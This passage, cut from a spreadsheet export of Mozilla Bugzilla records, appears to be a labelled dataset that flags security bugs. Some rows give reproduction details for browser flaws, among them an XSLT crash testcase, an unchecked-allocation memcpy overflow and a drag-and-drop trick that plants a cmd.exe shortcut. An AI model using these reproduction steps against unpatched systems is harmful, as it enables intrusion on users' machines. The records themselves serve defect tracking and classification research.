         location.reload()
         alert()
     &lt;/script&gt;
 &lt;/template&gt;
 &lt;/stylesheet&gt;
 ```
 This crashes e.g. once you relocate, insert an `&lt;iframe&gt;`, or un- and refocus the window. 
### Details
When an error occurs while processing an XSLT sheet, it's handled in `txMozillaXSLTProcessor::reportError()`. Here, a new XML document is created for the error report. It replaces the current one and uses a new inner window.
 Trace to illustrate how an XSLT error leads to a new `nsGlobalWindowInner`:
 ```cpp
 #0  nsGlobalWindowInner::nsGlobalWindowInner(nsGlobalWindowOuter*, mozilla::dom::WindowGlobalChild*) (this=0x7fc418bd7800, aOuterWindow=0x7fc447ba6bc0, aActor=0x0) at /builds/worker/checkouts/gecko/dom/base/nsGlobalWindowInner.cpp:938
 #1  0x00007fc4349f76f3 in nsGlobalWindowInner::Create(nsGlobalWindowOuter*, bool, mozilla::dom::WindowGlobalChild*) (aOuterWindow=0x7fc447ba6bc0, aIsChrome=false, aActor=0x0) at /builds/worker/checkouts/gecko/dom/base/nsGlobalWindowInner.cpp:7805
 #2  0x00007fc434a18542 in nsGlobalWindowOuter::SetNewDocument(mozilla::dom::Document*, nsISupports*, bool, mozilla::dom::WindowGlobalChild*) (this=0x7fc447ba6bc0, aDocument=0x7fc421842200, aState=0x0, aForceReuseInnerWindow=false, aActor=0x0) at /builds/worker/checkouts/gecko/dom/base/nsGlobalWindowOuter.cpp:2217
 #3  0x00007fc4393eedeb in nsDocumentViewer::SetDocumentInternal(mozilla::dom::Document*, bool) (this=0x7fc41be88040, aDocument=0x7fc421842200, aForceReuseInnerWindow=false) at /builds/worker/checkouts/gecko/layout/base/nsDocumentViewer.cpp:1883
 #4  0x00007fc4393ee9ae in nsDocumentViewer::SetDocument(mozilla::dom::Document*) (this=0x7fc41be88040, aDocument=0x7fc421842200) at /builds/worker/checkouts/gecko/layout/base/nsDocumentViewer.cpp:1834
 #5  0x00007fc4388beb8f in nsXMLContentSink::OnTransformDone(nsresult, mozilla::dom::Document*) (this=0x7fc4192ef000, aResult=nsresult::NS_ERROR_FAILURE, aResultDocument=0x7fc421842200) at /builds/worker/checkouts/gecko/dom/xml/nsXMLContentSink.cpp:354
 #6  0x00007fc43892d5fd in txMozillaXSLTProcessor::notifyError() (this=0x7fc41f44d1c0) at /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1028
 #7  0x00007fc43891fa5a in txMozillaXSLTProcessor::reportError(nsresult, char16_t const*, char16_t const*) (this=0x7fc41f44d1c0, aResult=nsresult::NS_ERROR_FAILURE, aErrorText=0x7fc41f4b2408 u"XML Parsing Error: syntax error\nLocation: data:,x\nLine Number 1, Column 1:", aSourceText=0x7ffdecb80e04 u"x\n^") at /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:958
 ```
Note that this is different to the handling of a non-XSLT XML parsing error which gets handled in `nsXMLContentSink::ReportError()`. In that case, the current node tree is just swapped out for a `&lt;parsererror&gt;` node (i.e. the DOM changes, but no new document is created). So I don't believe this bug extends to "regular" XML error pages.</t>
        </is>
      </c>
      <c r="X4415" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4416">
      <c r="A4416" t="n">
        <v>467005</v>
      </c>
      <c r="B4416" t="inlineStr">
        <is>
          <t>2008-11-27 09:28:10 -0800</t>
        </is>
      </c>
      <c r="C4416" t="inlineStr">
        <is>
          <t>Double items in layout when alert() called from mutation event handler</t>
        </is>
      </c>
      <c r="D4416" t="inlineStr">
        <is>
          <t>2010-06-20 10:04:04 -0700</t>
        </is>
      </c>
      <c r="E4416" t="n">
        <v>1</v>
      </c>
      <c r="F4416" t="n">
        <v>1</v>
      </c>
      <c r="G4416" t="n">
        <v>3</v>
      </c>
      <c r="H4416" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4416" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4416" t="inlineStr">
        <is>
          <t>DOM: Events</t>
        </is>
      </c>
      <c r="K4416" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4416" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4416" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4416" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4416" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4416" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q4416" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4416" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4416" t="inlineStr">
        <is>
          <t>mozilla1.9.3a1</t>
        </is>
      </c>
      <c r="T4416" t="n">
        <v>1</v>
      </c>
      <c r="U4416" t="n">
        <v>0</v>
      </c>
      <c r="V4416" t="n">
        <v>42</v>
      </c>
      <c r="W4416" t="inlineStr">
        <is>
          <t>Created attachment 350348
Test case that calls alert() from mutation event handler
Build id: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1b3pre) Gecko/20081127 Minefield/3.1b3pre
Steps to reproduce:
Load the attachment.
Actual results:
Content that is inserted once to the DOM shows up twice in layout. (Can't be selected, doesn't show up it Firebug inspector.)
Expected:
Expected things to show up in layout once.</t>
        </is>
      </c>
      <c r="X4416" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4417">
      <c r="A4417" t="n">
        <v>1335845</v>
      </c>
      <c r="B4417" t="inlineStr">
        <is>
          <t>2017-02-01 10:49:58 -0800</t>
        </is>
      </c>
      <c r="C4417" t="inlineStr">
        <is>
          <t>Image Drag and Drop Remote Code Execution</t>
        </is>
      </c>
      <c r="D4417" t="inlineStr">
        <is>
          <t>2023-01-16 20:32:29 -0800</t>
        </is>
      </c>
      <c r="E4417" t="n">
        <v>1</v>
      </c>
      <c r="F4417" t="n">
        <v>1</v>
      </c>
      <c r="G4417" t="n">
        <v>3</v>
      </c>
      <c r="H4417" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4417" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4417" t="inlineStr">
        <is>
          <t>DOM: Copy &amp; Paste and Drag &amp; Drop</t>
        </is>
      </c>
      <c r="K4417" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4417" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4417" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4417" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4417" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4417" t="inlineStr">
        <is>
          <t>[ iDefense V-92zvysquci][adv-main102+]</t>
        </is>
      </c>
      <c r="Q4417" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4417" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4417" t="inlineStr">
        <is>
          <t>102 Branch</t>
        </is>
      </c>
      <c r="T4417" t="n">
        <v>1</v>
      </c>
      <c r="U4417" t="n">
        <v>0</v>
      </c>
      <c r="V4417" t="n">
        <v>5</v>
      </c>
      <c r="W4417" t="inlineStr">
        <is>
          <t>iDefense VCP Submission V-92zvysquci
02/01/2017
Mozilla Firefox Image Drag and Drop Remote Code Execution Vulnerability (iDefense Zero Day)
Description: 
Remote exploitation of a design error vulnerability in the Mozilla Foundation's Firefox could allow an attacker to execute arbitrary code on the targeted host. 
*** A design error vulnerability exists in Firefox. Mozilla Firefox allows the creation of unsafe files on a host when performing drag and drop operations on images embedded in a webpage.
Analysis: 
Exploitation of this vulnerability allows the attacker to execute arbitrary code on the target. Exploitation requires that attackers social engineer victims into viewing a malicious Web page. To exploit this issue, an attacker must convince an user into performing a drag and drop operation on an image with a specially crafted file name with two extensions to the local file system. Firefox truncates characters from the final filename when the image's file name is longer than 128 characters. This could lead to arbitrary code execution when the user opens the created file.
iDefense considers this vulnerability to be of MEDIUM severity due to the need for social engineering and user interaction.
Credit: 
Eduardo Braun Prado</t>
        </is>
      </c>
      <c r="X4417" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4418">
      <c r="A4418" t="n">
        <v>1002832</v>
      </c>
      <c r="B4418" t="inlineStr">
        <is>
          <t>2014-04-28 17:23:42 -0700</t>
        </is>
      </c>
      <c r="C4418" t="inlineStr">
        <is>
          <t>Tracking bug for build and release of SeaMonkey 2.26</t>
        </is>
      </c>
      <c r="D4418" t="inlineStr">
        <is>
          <t>2014-05-30 17:27:48 -0700</t>
        </is>
      </c>
      <c r="E4418" t="n">
        <v>1</v>
      </c>
      <c r="F4418" t="n">
        <v>1</v>
      </c>
      <c r="G4418" t="n">
        <v>2</v>
      </c>
      <c r="H4418" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4418" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J4418" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="K4418" t="inlineStr">
        <is>
          <t>SeaMonkey 2.26 Branch</t>
        </is>
      </c>
      <c r="L4418" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4418" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4418" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4418" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4418" t="inlineStr"/>
      <c r="Q4418" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4418" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S4418" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4418" t="n">
        <v>1</v>
      </c>
      <c r="U4418" t="n">
        <v>0</v>
      </c>
      <c r="V4418" t="n">
        <v>9</v>
      </c>
      <c r="W4418" t="inlineStr">
        <is>
          <t>This is a tracking bug for Build and Release of SeaMonkey 2.26
We expect an actual release on Thursday May 1st.</t>
        </is>
      </c>
      <c r="X4418" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4419">
      <c r="A4419" t="n">
        <v>408674</v>
      </c>
      <c r="B4419" t="inlineStr">
        <is>
          <t>2007-12-17 07:04:14 -0800</t>
        </is>
      </c>
      <c r="C4419" t="inlineStr">
        <is>
          <t>Need a command-line script to automatically add new entries</t>
        </is>
      </c>
      <c r="D4419" t="inlineStr">
        <is>
          <t>2010-01-26 06:43:06 -0800</t>
        </is>
      </c>
      <c r="E4419" t="n">
        <v>1</v>
      </c>
      <c r="F4419" t="n">
        <v>1</v>
      </c>
      <c r="G4419" t="n">
        <v>4</v>
      </c>
      <c r="H4419" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4419" t="inlineStr">
        <is>
          <t>Webtools</t>
        </is>
      </c>
      <c r="J4419" t="inlineStr">
        <is>
          <t>Bouncer</t>
        </is>
      </c>
      <c r="K4419" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4419" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4419" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4419" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4419" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4419" t="inlineStr">
        <is>
          <t>[tx]</t>
        </is>
      </c>
      <c r="Q4419" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4419" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4419" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4419" t="n">
        <v>1</v>
      </c>
      <c r="U4419" t="n">
        <v>0</v>
      </c>
      <c r="V4419" t="n">
        <v>15</v>
      </c>
      <c r="W4419" t="inlineStr">
        <is>
          <t>Bouncer needs to be able to add new entries from the command line in order to fit into the build bootstrap.
When a build completes, and bits are staged, build has to manually create entries.  We need to create a simple utility that can interface with Bouncer and create product entries as they are completed.
John or Rob can you list what params are available from the bootstrap?  Bouncer needs:
1) product name
2) platform
3) locale
Will these be used one-at-a-time or will the script need to accept arrays of values?</t>
        </is>
      </c>
      <c r="X4419" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4420">
      <c r="A4420" t="n">
        <v>1201183</v>
      </c>
      <c r="B4420" t="inlineStr">
        <is>
          <t>2015-09-02 11:17:16 -0700</t>
        </is>
      </c>
      <c r="C4420" t="inlineStr">
        <is>
          <t>Buffer overflow on OOM in DirectWriteFontInfo::LoadFontFamilyData</t>
        </is>
      </c>
      <c r="D4420" t="inlineStr">
        <is>
          <t>2016-07-02 11:18:42 -0700</t>
        </is>
      </c>
      <c r="E4420" t="n">
        <v>1</v>
      </c>
      <c r="F4420" t="n">
        <v>1</v>
      </c>
      <c r="G4420" t="n">
        <v>3</v>
      </c>
      <c r="H4420" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4420" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4420" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K4420" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4420" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4420" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4420" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4420" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4420" t="inlineStr">
        <is>
          <t>[b2g-adv-main2.5-][post-critsmash-triage][adv-main43+]</t>
        </is>
      </c>
      <c r="Q4420" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4420" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4420" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T4420" t="n">
        <v>1</v>
      </c>
      <c r="U4420" t="n">
        <v>0</v>
      </c>
      <c r="V4420" t="n">
        <v>14</v>
      </c>
      <c r="W4420" t="inlineStr">
        <is>
          <t>In bug 968520 q1@lastland.net posted:
(In reply to q1 from comment #137)
&gt; There is now an array-overrun bug in DirectWriteFontInfo::LoadFontFamilyData
&gt; (gfx/thebes/gfxDWriteFontList.cpp):
&gt; 
&gt;     // lookup the family
&gt;      nsAutoTArray&lt;wchar_t, 32&gt; famName;
&gt;  
&gt;      uint32_t len = aFamilyName.Length();
&gt; -    famName.SetLength(len + 1);
&gt; +    famName.SetLength(len + 1, fallible);
&gt;      memcpy(famName.Elements(), aFamilyName.BeginReading(), len *
&gt; sizeof(char16_t));
&gt;      famName[len] = 0;
&gt; 
&gt; SetLength used to be infallible, but the code now uses the fallible version
&gt; without a status check. So on OOM the memcpy will overwrite some amount of
&gt; unowned memory. Since this is Aurora (?) code, I've filed the bug here
&gt; rather than in a separate report.
Thanks for the bug report, but please file security issues as security bugs that affect code we're shipping on any channel, including Nightly and Aurora.</t>
        </is>
      </c>
      <c r="X4420" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4421">
      <c r="A4421" t="n">
        <v>912842</v>
      </c>
      <c r="B4421" t="inlineStr">
        <is>
          <t>2013-09-04 22:32:05 -0700</t>
        </is>
      </c>
      <c r="C4421" t="inlineStr">
        <is>
          <t>[Buri][Camera][REG]Photo does not return to its original size</t>
        </is>
      </c>
      <c r="D4421" t="inlineStr">
        <is>
          <t>2013-09-25 17:43:02 -0700</t>
        </is>
      </c>
      <c r="E4421" t="n">
        <v>1</v>
      </c>
      <c r="F4421" t="n">
        <v>1</v>
      </c>
      <c r="G4421" t="n">
        <v>6</v>
      </c>
      <c r="H4421" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4421" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J4421" t="inlineStr">
        <is>
          <t>Gaia::Camera</t>
        </is>
      </c>
      <c r="K4421" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4421" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4421" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4421" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4421" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4421" t="inlineStr"/>
      <c r="Q4421" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4421" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4421" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4421" t="n">
        <v>1</v>
      </c>
      <c r="U4421" t="n">
        <v>0</v>
      </c>
      <c r="V4421" t="n">
        <v>22</v>
      </c>
      <c r="W4421" t="inlineStr">
        <is>
          <t>Firefox os  v1.1
 Mozilla build ID:20130828041203
 Created an attachment (id=508367)
 picture
 DEFECT DESCRIPTION:
 After switch landscape and Portrait mode,photo does not return to its original size
 REPRODUCING PROCEDURES:
 1.launch camera app
 2.open a picture in photo (fullscreen) mode
 3.Rotate the phone to landscape mode
 4.double tap on photo and then double tap again 
 5.Rotate the phone to Portrait mode--&gt;photo does not return to its original size--&gt;ko
 EXPECTED BEHAVIOUR:
 ko:Photo should be restored to its original size
 ASSOCIATE SPECIFICATION:
 TEST PLAN REFERENCE:
 TOOLS AND PLATFORMS USED:
 USER IMPACT:
 Mid
 REPRODUCING RATE:
 5/5</t>
        </is>
      </c>
      <c r="X4421" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4422">
      <c r="A4422" t="n">
        <v>291640</v>
      </c>
      <c r="B4422" t="inlineStr">
        <is>
          <t>2005-04-23 14:49:26 -0700</t>
        </is>
      </c>
      <c r="C4422" t="inlineStr">
        <is>
          <t>Drag and drop can create shortcuts to local files</t>
        </is>
      </c>
      <c r="D4422" t="inlineStr">
        <is>
          <t>2023-10-17 21:05:08 -0700</t>
        </is>
      </c>
      <c r="E4422" t="n">
        <v>1</v>
      </c>
      <c r="F4422" t="n">
        <v>1</v>
      </c>
      <c r="G4422" t="n">
        <v>3</v>
      </c>
      <c r="H4422" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4422" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4422" t="inlineStr">
        <is>
          <t>DOM: Copy &amp; Paste and Drag &amp; Drop</t>
        </is>
      </c>
      <c r="K4422" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4422" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M4422" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4422" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4422" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4422" t="inlineStr">
        <is>
          <t>[sg:moderate][adv-main115+] high with cooperation from the victim</t>
        </is>
      </c>
      <c r="Q4422" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4422" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S4422" t="inlineStr">
        <is>
          <t>115 Branch</t>
        </is>
      </c>
      <c r="T4422" t="n">
        <v>1</v>
      </c>
      <c r="U4422" t="n">
        <v>0</v>
      </c>
      <c r="V4422" t="n">
        <v>30</v>
      </c>
      <c r="W4422" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3
In the page javascript:'Drag this broken image to the desktop:&lt;img
src="C:/windows/system32/cmd.exe"&gt;', dragging the broken image to the desktop
will create a shortcut to cmd.exe, which, when opened, will spawn cmd.exe
Reproducible: Always
Steps to Reproduce:
1.javascript:'Drag this broken image to the desktop:&lt;img
src="C:/windows/system32/cmd.exe"&gt;'
2. drag broken image to desktop
3. double click new icon on desktop
Actual Results:  
cmd.exe opened
Expected Results:  
executable files shouldnt be draggable</t>
        </is>
      </c>
      <c r="X4422" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4423">
      <c r="A4423" t="n">
        <v>499844</v>
      </c>
      <c r="B4423" t="inlineStr">
        <is>
          <t>2009-06-22 17:18:55 -0700</t>
        </is>
      </c>
      <c r="C4423" t="inlineStr">
        <is>
          <t>"ASSERTION: not an element node: 'element'" with execCommand("outdent"), combining acute accent</t>
        </is>
      </c>
      <c r="D4423" t="inlineStr">
        <is>
          <t>2010-09-27 19:55:59 -0700</t>
        </is>
      </c>
      <c r="E4423" t="n">
        <v>1</v>
      </c>
      <c r="F4423" t="n">
        <v>1</v>
      </c>
      <c r="G4423" t="n">
        <v>3</v>
      </c>
      <c r="H4423" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4423" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4423" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K4423" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4423" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4423" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4423" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4423" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4423" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q4423" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4423" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4423" t="inlineStr">
        <is>
          <t>mozilla1.9.3a2</t>
        </is>
      </c>
      <c r="T4423" t="n">
        <v>1</v>
      </c>
      <c r="U4423" t="n">
        <v>0</v>
      </c>
      <c r="V4423" t="n">
        <v>27</v>
      </c>
      <c r="W4423" t="inlineStr">
        <is>
          <t>Created attachment 384527
testcase
###!!! ASSERTION: not an element node: 'element', file nsHTMLEditRules.cpp, line 8814
###!!! ASSERTION: Attempting to allocate excessively large array: 'Error', file nsTArray.cpp, line 69</t>
        </is>
      </c>
      <c r="X4423" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4424">
      <c r="A4424" t="n">
        <v>1438254</v>
      </c>
      <c r="B4424" t="inlineStr">
        <is>
          <t>2018-02-14 10:29:01 -0800</t>
        </is>
      </c>
      <c r="C4424" t="inlineStr">
        <is>
          <t>Change default owner and QA for NSS::CA Certificate Mis-Issuance bugs</t>
        </is>
      </c>
      <c r="D4424" t="inlineStr">
        <is>
          <t>2018-02-14 16:54:27 -0800</t>
        </is>
      </c>
      <c r="E4424" t="n">
        <v>1</v>
      </c>
      <c r="F4424" t="n">
        <v>1</v>
      </c>
      <c r="G4424" t="n">
        <v>7</v>
      </c>
      <c r="H4424" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4424" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J4424" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K4424" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L4424" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4424" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4424" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4424" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4424" t="inlineStr"/>
      <c r="Q4424" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4424" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4424" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4424" t="n">
        <v>1</v>
      </c>
      <c r="U4424" t="n">
        <v>0</v>
      </c>
      <c r="V4424" t="n">
        <v>6</v>
      </c>
      <c r="W4424" t="inlineStr">
        <is>
          <t>For bugs with 
Product = NSS
Component = CA Certificate Mis-Issuance 
Please change the default Assignee to wthayer@mozilla.com.
And change the default QA Contact to kwilson@mozilla.com.
Thanks!</t>
        </is>
      </c>
      <c r="X4424" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4425">
      <c r="A4425" t="n">
        <v>503451</v>
      </c>
      <c r="B4425" t="inlineStr">
        <is>
          <t>2009-07-09 18:57:39 -0700</t>
        </is>
      </c>
      <c r="C4425" t="inlineStr">
        <is>
          <t>GeckoActiveXObject exception messages can be used to enumerate installed COM objects</t>
        </is>
      </c>
      <c r="D4425" t="inlineStr">
        <is>
          <t>2016-03-10 08:05:15 -0800</t>
        </is>
      </c>
      <c r="E4425" t="n">
        <v>1</v>
      </c>
      <c r="F4425" t="n">
        <v>1</v>
      </c>
      <c r="G4425" t="n">
        <v>3</v>
      </c>
      <c r="H4425" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4425" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4425" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K4425" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4425" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4425" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N4425" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4425" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4425" t="inlineStr">
        <is>
          <t>[sg:low]</t>
        </is>
      </c>
      <c r="Q4425" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4425" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4425" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4425" t="n">
        <v>1</v>
      </c>
      <c r="U4425" t="n">
        <v>0</v>
      </c>
      <c r="V4425" t="n">
        <v>15</v>
      </c>
      <c r="W4425" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.1pre) Gecko/20090708 Shiretoko/3.5.1pre
The exception messages from GeckoActiveXObject differ based on whether the requested COM object ProgID is present in the Windows registry.
Exception messages:
 - COM object not installed: COM Error Result = 800401f3
 - COM object installed: COM Error Result = 80004005
By creating an extensive list of ProgID's it would be possible to profile a user.  Some software installs different ProgID's based on version, so specific version detection is also possible.
This behavior may lead to a loss of user privacy or allow for targeted exploitation.
Reproducible: Always</t>
        </is>
      </c>
      <c r="X4425" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4426">
      <c r="A4426" t="n">
        <v>1349276</v>
      </c>
      <c r="B4426" t="inlineStr">
        <is>
          <t>2017-03-21 10:52:03 -0700</t>
        </is>
      </c>
      <c r="C4426" t="inlineStr">
        <is>
          <t>Paths received by FileSystemRequestParent need to be sanitized before passed to IsDescendantPath</t>
        </is>
      </c>
      <c r="D4426" t="inlineStr">
        <is>
          <t>2017-10-26 19:13:24 -0700</t>
        </is>
      </c>
      <c r="E4426" t="n">
        <v>1</v>
      </c>
      <c r="F4426" t="n">
        <v>1</v>
      </c>
      <c r="G4426" t="n">
        <v>3</v>
      </c>
      <c r="H4426" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4426" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4426" t="inlineStr">
        <is>
          <t>Security: Process Sandboxing</t>
        </is>
      </c>
      <c r="K4426" t="inlineStr">
        <is>
          <t>55 Branch</t>
        </is>
      </c>
      <c r="L4426" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4426" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4426" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4426" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4426" t="inlineStr">
        <is>
          <t>sbmc2 sbwc2 sblc3 [adv-main53+][adv-esr52.1+]</t>
        </is>
      </c>
      <c r="Q4426" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4426" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4426" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T4426" t="n">
        <v>1</v>
      </c>
      <c r="U4426" t="n">
        <v>0</v>
      </c>
